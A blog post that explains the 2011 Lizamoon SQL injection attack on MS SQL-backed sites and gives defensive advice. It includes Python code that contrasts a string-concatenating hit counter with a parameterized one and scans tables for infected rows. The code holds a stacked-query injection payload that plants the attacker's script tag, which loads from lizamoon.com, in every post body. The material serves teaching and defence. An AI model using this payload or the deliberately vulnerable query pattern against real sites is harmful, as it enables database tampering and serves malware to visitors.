The Great Lizamoon SQL Injection Attack – March-April 2011



Well, Friday things started getting interesting on tech news sites. Most sites were running phony April Fools' stories, but a few, including Websense, were running with a major attack going on against many SQL-backed websites. Details were sketchy. People were told to look for ur.php files in their web directory, which isn't a good test of whether your site has been hit by this SQL injection: ur.php lives on the attacker's domain, and what lands on a compromised site is a reference to it stored inside the database. The code inserted into the SQL databases looks like "<script src=http://lizamoon.com/ur.php></script>". What it basically does is send visitors to a scareware site that claims their computer has a virus and tries to install malware on it. (How many of those have we seen in the last 5-10 years?)

One of my annoyances with tech news (and especially virus news) coverage is that when a story gets big enough to be covered by the big media, they never do it justice. I want information. What is this attacking? What programs are vulnerable? Is there a pattern?


This is one of the things that annoyed me about the coverage of this particular beastie.... okay, fine, it's an SQL injection, but is it MySQL? MS SQL? Some other blend? Is it attacking WordPress or Drupal or Movable Type or what? Not much detail was to be found. There were outrageous claims of 4 million sites infected (which is wildly inflated). The best estimate I've seen is in the 200,000+ range. Google searches showed millions of pages with the suspect text, although that included multiple pages per site and many sites that were simply reporting on the exploit.

So.... Saturday I was asked about it and I hadn't been able to do much research. I did a bit and found that nearly every affected site Websense had identified was running a Microsoft SQL backend. At that point I breathed a bit easier, since I wouldn't be urgently upgrading 50 or so MySQL-based blog engines. In fact, after reading a bit further I essentially filed it for the weekend, as I have nothing deployed that depends on MS SQL.

So, today I was thinking that there must be some pattern to what is vulnerable.... Looking at the Google search that shows the infected blurb of code....

I see .cfm pages, .asp pages, .aspx pages. I found a site with this powered-by line:

“Mango Blog – A ColdFusion blog engine”

I see several other sites that seem to be database driven, but it's unclear what site design engine I'm looking at. Really the common denominator is ASP or ColdFusion on the front end, Microsoft's web application framework, and (per the Websense list) a Microsoft SQL Server backend.

The best advice that is given is that you should always filter/validate input before it reaches the database. In other words, don't trust your site visitors to put good things in forms. Assume they will try to break through to the database underneath using characters (a stray quote, a semicolon, a comment marker) that tell your database it's time to run a command instead of treating the input as text.

There is a good ASP.NET article on preventing SQL injection.

It really is reminiscent of that great xkcd cartoon.... about little Bobby Tables....

That much said.... it seems that the better advice is to parameterize your SQL calls, so the query text and the visitor's data reach the database separately and it never has to guess which is which. Filtering input is a useful second layer, not a substitute.

Good tutorial site on avoiding SQL injection problems...
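To make the two pieces of advice concrete, here is an added example (my own illustration for this post, not code from the original article, from Websense, or the worm's actual payload). It uses Python's built-in sqlite3 module as a stand-in for an ASP page talking to MS SQL: a hit counter written with string concatenation, the same counter parameterized, and a scan that walks every text column of every table for the injected tag, which is a far better check than looking for ur.php on disk. The table, rows and attack string are constructed for the example; the real worm sent a T-SQL batch that enumerated sysobjects/syscolumns, and this payload is the same idea in SQLite syntax.

```python
import sqlite3

# The string the post says Lizamoon appended to text columns (a constructed copy here).
INJECTED_TAG = "<script src=http://lizamoon.com/ur.php></script>"

# Constructed attack input for a numeric page parameter (e.g. ?id=1). The real worm sent a
# T-SQL batch that walked sysobjects/syscolumns and appended the tag to every text column;
# this is the same idea in SQLite syntax (|| is SQLite's string concatenation).
PAYLOAD = "1; UPDATE posts SET body = body || '" + INJECTED_TAG + "'"


def build_db():
    """Constructed sample: a tiny posts table standing in for a site's SQL backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT, body TEXT, "
        "views INTEGER NOT NULL DEFAULT 0)"
    )
    conn.executemany(
        "INSERT INTO posts (title, body) VALUES (?, ?)",
        [("Hello", "first post"), ("News", "second post")],
    )
    conn.commit()
    return conn


def bump_views_vulnerable(conn, post_id):
    """The classic dynamic-SQL hit counter: the request parameter is pasted into the SQL
    text, so the database reads attacker-supplied text as commands. executescript() runs a
    multi-statement batch, as ADO's Connection.Execute does against MS SQL."""
    conn.executescript("UPDATE posts SET views = views + 1 WHERE id = " + post_id)
    conn.commit()


def bump_views_safe(conn, post_id):
    """Parameterized query plus type validation: the id is bound as a value, never spliced
    into the SQL text, and a non-numeric id is rejected before the database sees it."""
    pid = int(post_id)  # raises ValueError for "1; UPDATE ..."
    cur = conn.execute("UPDATE posts SET views = views + 1 WHERE id = ?", (pid,))
    conn.commit()
    return cur.rowcount


def get_post(conn, post_id):
    """Return (title, body, views) for one post, or None if it does not exist."""
    return conn.execute(
        "SELECT title, body, views FROM posts WHERE id = ?", (post_id,)
    ).fetchone()


def find_injected_rows(conn, marker=INJECTED_TAG):
    """Scan every text column of every user table for the marker, the way the worm itself
    walked the schema. Returns {"table.column": rows_containing_marker} for columns with
    hits. Table and column names come from the schema catalogue, not from user input, which
    is why they are quoted into the SQL text (identifiers cannot be bound as parameters)."""
    hits = {}
    tables = [row[0] for row in conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' AND name NOT LIKE 'sqlite_%'"
    )]
    for table in tables:
        for _cid, col, ctype, *_rest in conn.execute(f'PRAGMA table_info("{table}")'):
            if ctype.upper() not in ("TEXT", "CHAR", "VARCHAR", "NCHAR", "NVARCHAR", "NTEXT"):
                continue
            n = conn.execute(
                f'SELECT COUNT(*) FROM "{table}" WHERE "{col}" LIKE ?', ("%" + marker + "%",)
            ).fetchone()[0]
            if n:
                hits[f"{table}.{col}"] = n
    return hits


if __name__ == "__main__":
    conn = build_db()
    bump_views_vulnerable(conn, PAYLOAD)
    print("dynamic SQL page, after one request:", find_injected_rows(conn))

    conn = build_db()
    try:
        bump_views_safe(conn, PAYLOAD)
    except ValueError as err:
        print("parameterized page rejected the request:", err)
    print("parameterized page, after one request:", find_injected_rows(conn))
```

One request to the concatenating page is enough to stamp every post body with the tag; the parameterized page never gets that far because int() refuses the string, and even without the cast the bound value would only ever be compared against id, never executed. On a real MS SQL server the same scan is a loop over INFORMATION_SCHEMA.COLUMNS filtered to the character types, with a LIKE against each column.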

I suspect there are many hundreds of site owners who still aren't aware that they were compromised.

So here's the flamebait: are poor SQL coding practices a common trait in the Microsoft toolkit environment?

I doubt it's just an MS toolkit issue, although the proliferation of "easily make your own database-driven site" toolkits would seem to encourage sloppy design. (Yes, I know... open source blog engines have had their share of SQL injection issues too....)

Making it easy for anyone to make a database-driven website does not mean everyone will follow best practices for validating input. (In fact, in most things I've seen, making things easier seems to encourage cutting corners...)
